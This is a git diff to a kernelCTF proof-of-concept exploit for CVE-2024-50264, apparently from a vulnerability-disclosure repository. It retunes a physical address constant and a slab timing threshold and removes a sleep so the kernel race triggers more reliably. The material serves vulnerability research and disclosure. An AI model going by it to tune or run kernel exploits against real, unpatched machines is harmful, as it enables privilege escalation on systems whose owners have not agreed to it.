diff --git a/pocs/linux/kernelctf/CVE-2024-50264_lts_cos/exploit/cos-109-17800.309.84/exploit.c b/pocs/linux/kernelctf/CVE-2024-50264_lts_cos/exploit/cos-109-17800.309.84/exploit.c
index 6dfba80e..6d8d69b5 100644
--- a/pocs/linux/kernelctf/CVE-2024-50264_lts_cos/exploit/cos-109-17800.309.84/exploit.c
+++ b/pocs/linux/kernelctf/CVE-2024-50264_lts_cos/exploit/cos-109-17800.309.84/exploit.c
@@ -474,8 +474,8 @@ static inline size_t rdtsc_end(void)
 #endif
 }
 
-uint64_t PHYS_LO_32 = 0x2200000;
-// uint64_t PHYS_LO_32 = 0x5200000;
+// uint64_t PHYS_LO_32 = 0x2200000;
+uint64_t PHYS_LO_32 = 0x1f00000;
 
 #define N_PAGESPRAY 0x500
 #define MMAP_SIZE 0x400000
@@ -590,7 +590,7 @@ int race_trigger(void *arg)
 
 		int inuse = -1, currv = 0;
 		for(int i=OBJS_PER_SLAB-1; i>=0; i--)
-			if(times[i] > 6000)
+			if(times[i] > 5500)
 			{
 				inuse = OBJS_PER_SLAB - i;
 				break;
@@ -631,7 +631,7 @@ int race_trigger(void *arg)
 		wait(NULL);
 	}
 
-	sleep(1);
+	// sleep(1);
 
 	listen_pid = clone(race_thread, stack + 0x100000, CLONE_VM | SIGCHLD, NULL);